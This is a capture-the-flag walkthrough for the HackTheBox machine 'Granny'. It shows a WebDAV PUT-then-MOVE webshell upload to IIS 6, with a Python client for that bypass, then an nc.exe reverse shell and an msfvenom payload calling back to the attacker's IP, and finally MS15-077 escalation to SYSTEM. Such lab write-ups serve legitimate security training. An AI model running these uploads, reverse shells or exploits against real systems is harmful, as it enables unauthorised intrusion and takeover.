Granny
An easy Windows box from HackTheBox: initial access comes from uploading an ASPX webshell over WebDAV (PUT it as a .txt, then MOVE it to .aspx), and privilege escalation from a kernel exploit on an unpatched Windows Server 2003.
Recon
Running the usual nmap scan (default scripts plus version detection) against the box
sudo nmap -sC -sV -oA nmap/init 10.10.10.15
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Sun, 18 Sep 2022 17:29:26 GMT
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nearly every WebDAV method is advertised, including PUT (which uploads a file to the server) and MOVE/COPY (which rename or duplicate files server-side). PUT on its own might let us upload a webshell; MOVE turns out to matter as well.
Exploitation
First, we need an ASPX webshell; I like this one
Then open up Burp Suite and intercept a request to the site (refreshing the page in the browser is enough)
and send the request to Repeater.
Turn it into an upload: change the method to PUT, put the target file name in the request line (here /shell.aspx), and paste the webshell source in as the request body.
Sending it fails: the server refuses the upload with 403 Forbidden. IIS 6 does not accept a WebDAV PUT for a script-mapped extension such as .aspx unless script source access is granted, but it does not apply the same check to MOVE.
The workaround is to upload the file with a harmless extension (.txt) and then rename it to .aspx with a MOVE request.
So, upload the webshell as shell.txt
and confirm it is there by requesting it from the server.
Then rename it with a MOVE request: change the method to MOVE, request /shell.txt, and add a Destination header of "/shell.aspx"
Browsing to /shell.aspx now gives a working webshell: command execution as the IIS worker account, though not yet an interactive shell.
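The PUT-then-MOVE exchange above, as an added example that is not part of the original writeup. Because there is no box to talk to offline, the target is a small mock WebDAV handler (constructed for this example) that imitates the behaviour seen on Granny: a PUT of a script extension is refused with 403, a PUT of a .txt is accepted, and MOVE simply honours the Destination header with no extension check. The client functions are plain http.client calls, so upload_via_move() can be pointed at a real host and port (for this box, 10.10.10.15 on 80) instead of the mock.

```python
"""PUT a .txt, then MOVE it to .aspx: the IIS 6 WebDAV extension-filter bypass.

Added example, not code from the original writeup. The server side is a
constructed stand-in for IIS 6 WebDAV; the client side is what Burp Repeater
was doing by hand above.
"""
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import urlsplit

# Assumption for the mock: extensions the server refuses on PUT.
BLOCKED_EXTENSIONS = (".aspx", ".asp", ".asa")


class MockIIS6WebDAV(BaseHTTPRequestHandler):
    """Constructed mock of the IIS 6 behaviour; files live in a class-level dict."""
    files = {}

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_PUT(self):
        # PUT of a script-mapped extension -> 403, exactly what Burp showed.
        if self.path.lower().endswith(BLOCKED_EXTENSIONS):
            self.send_response(403)
            self.end_headers()
            return
        length = int(self.headers.get("Content-Length", 0))
        self.files[self.path] = self.rfile.read(length)
        self.send_response(201)
        self.end_headers()

    def do_MOVE(self):
        # MOVE only looks at the Destination header; the extension is never checked.
        dest = urlsplit(self.headers.get("Destination", "")).path
        if self.path not in self.files or not dest:
            self.send_response(404)
            self.end_headers()
            return
        self.files[dest] = self.files.pop(self.path)
        self.send_response(201)
        self.end_headers()

    def do_GET(self):
        body = self.files.get(self.path)
        if body is None:
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_mock_server():
    """Start the mock on 127.0.0.1 with a random port; returns (host, port)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), MockIIS6WebDAV)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address


def webdav_request(host, port, method, path, body=b"", headers=None):
    """Send one WebDAV request (any method string) and return the status code."""
    conn = HTTPConnection(host, port, timeout=5)
    hdrs = {"Content-Length": str(len(body))}
    hdrs.update(headers or {})
    conn.request(method, path, body=body, headers=hdrs)
    status = conn.getresponse().status
    conn.close()
    return status


def upload_via_move(host, port, payload, final_name="shell.aspx"):
    """PUT the payload as <name>.txt, then MOVE it to final_name.

    Returns (put_status, move_status): both 201 when the bypass works.
    """
    staging = "/" + final_name.rsplit(".", 1)[0] + ".txt"
    put_status = webdav_request(host, port, "PUT", staging, payload,
                                {"Content-Type": "text/plain"})
    move_status = webdav_request(
        host, port, "MOVE", staging,
        headers={"Destination": f"http://{host}:{port}/{final_name}",
                 "Overwrite": "T"})
    return put_status, move_status


if __name__ == "__main__":
    host, port = start_mock_server()
    # Constructed placeholder body; substitute the real webshell source.
    shell = b'<%@ Page Language="C#" %><!-- placeholder, not a real webshell -->'
    print("direct PUT /shell.aspx ->", webdav_request(host, port, "PUT", "/shell.aspx", shell))
    print("PUT .txt then MOVE      ->", upload_via_move(host, port, shell))
    print("GET /shell.aspx         ->", webdav_request(host, port, "GET", "/shell.aspx"))
```

Against the real box the Destination header can be the bare path the writeup used or a full URL; the mock accepts either because it only reads the path component.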
Next, use SMB to get nc.exe onto the box and spawn a proper reverse shell.
Copy nc.exe into the working directory, then host that directory with impacket's smbserver.py (it speaks SMB1 by default, which a Server 2003 client needs)
smbserver.py share .
Then set up a listener on port 4444 (rlwrap adds line editing and history to the netcat session)
and in the webshell's command box type the following (KALI_IP is 10.10.14.5 in this run; the leading /c is because this webshell passes the text straight to cmd.exe as its arguments)
/c \\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444
That runs nc.exe directly from the UNC path without writing it to disk, and we get a shell!
┌──(kali㉿kali)-[~/Documents/htb/granny]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.15] 1032
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
Then run systeminfo to collect the OS version, architecture and installed hotfixes, and save the output to a text file on Kali for the exploit suggester
c:\windows\system32\inetsrv> systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 1 Hours, 57 Minutes, 24 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 739 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,283 MB
Page File: In Use: 187 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
From here, run Windows Exploit Suggester - Next Generation (WES-NG) against the saved systeminfo text file; with a single hotfix on Server 2003 SP2 it reports a lot of privilege escalation candidates
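What WES-NG actually keys on in that file is the OS version, service pack, architecture and the hotfix list, so the parse below is an added example (not WES-NG's own code and not part of the original writeup) that extracts exactly those fields from the systeminfo output shown above. The sample is trimmed from that output. The one format subtlety is that multi-value fields (Hotfix(s), Processor(s)) put their items on indented "[NN]:" lines after the header line. When running the real tool, narrow the results the same way this writeup did, to elevation-of-privilege entries with a public exploit (check wes.py --help for the impact and exploits-only flags).

```python
"""Pull the WES-NG lookup fields out of a systeminfo dump.

Added example, not code from the writeup or from WES-NG. The sample text is
trimmed from the systeminfo output shown on the page.
"""
import re

SYSTEMINFO_SAMPLE = """\
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
 [01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
Hotfix(s): 1 Hotfix(s) Installed.
 [01]: Q147222
Network Card(s): N/A
"""

# Indented continuation items such as " [01]: Q147222".
_ITEM = re.compile(r"^\s+\[\d+\]:\s*(.*)$")
_VERSION = re.compile(r"^(\d+\.\d+\.\d+)(?: Service Pack (\d+))?")


def parse_systeminfo(text):
    """Return (fields, items).

    fields maps "Key" -> value for every "Key: value" line; items maps the
    keys that have indented "[NN]:" continuation lines to the list of those
    items (hotfixes, processors). Keys that repeat, like the three
    "Page File:" lines, keep only the last value, which is fine for WES-NG.
    """
    fields, items, current = {}, {}, None
    for line in text.splitlines():
        m = _ITEM.match(line)
        if m and current:
            items.setdefault(current, []).append(m.group(1).strip())
        elif ":" in line and not line.startswith(" "):
            key, _, value = line.partition(":")
            current = key.strip()
            fields[current] = value.strip()
    return fields, items


def hotfixes(items):
    """Installed hotfix IDs; an empty list means nothing at all is patched."""
    return items.get("Hotfix(s)", [])


def wesng_key(fields):
    """(kernel version, service pack or None, arch): what the suggester matches on."""
    m = _VERSION.match(fields.get("OS Version", ""))
    version, sp = (m.group(1), m.group(2)) if m else (fields.get("OS Version", ""), None)
    arch = "x86" if fields.get("System Type", "").lower().startswith("x86") else "x64"
    return version, sp, arch


if __name__ == "__main__":
    fields, items = parse_systeminfo(SYSTEMINFO_SAMPLE)
    print("lookup key:", wesng_key(fields))
    print("hotfixes:  ", hotfixes(items))
```

On Granny this yields a 5.2.3790 SP2 x86 kernel with one hotfix, which is why the suggester's list is so long and why a 32-bit payload is the right choice below.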
I opted to use MS15-077: I uploaded the exploit exe to the victim, as well as a reverse shell executable (made with msfvenom)
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f exe > rev.exe
Set up a listener for it
rlwrap nc -lnvp 9001
and host both executables with smbserver.py again
smbserver.py share .
Then on the victim, change to C:\WINDOWS\TEMP (writable by the service account) and copy them over from the share
c:\windows\TEMP> copy \\10.10.14.5\share\elevator.exe elevator.exe
c:\windows\TEMP> copy \\10.10.14.5\share\rev.exe rev.exe
And run the exploit, passing the reverse shell binary as the program it should launch with elevated privileges
c:\windows\TEMP> elevator.exe rev.exe
Check back on the listener
listening on [any] 9001 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.15] 1037
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\Temp>whoami
nt authority\system
And we have SYSTEM, the Windows equivalent of root!